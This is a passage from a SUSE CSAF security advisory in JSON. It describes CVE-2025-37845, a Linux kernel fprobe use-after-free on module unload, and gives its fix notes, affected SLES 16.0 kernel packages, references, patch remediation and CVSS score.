"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-37841"
},
{
"cve": "CVE-2025-37845",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37845"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: fprobe events: Fix possible UAF on modules\n\nCommit ac91052f0ae5 (\"tracing: tprobe-events: Fix leakage of module\nrefcount\") moved try_module_get() from __find_tracepoint_module_cb()\nto find_tracepoint() caller, but that introduced a possible UAF\nbecause the module can be unloaded before try_module_get(). In this\ncase, the module object should be freed too. Thus, try_module_get()\ndoes not only fail but may access to the freed object.\n\nTo avoid that, try_module_get() in __find_tracepoint_module_cb()\nagain.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37845",
"url": "https://www.suse.com/security/cve/CVE-2025-37845"
},
{
"category": "external",
"summary": "SUSE Bug 1242986 for CVE-2025-37845",
"url": "https://bugzilla.suse.com/1242986"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
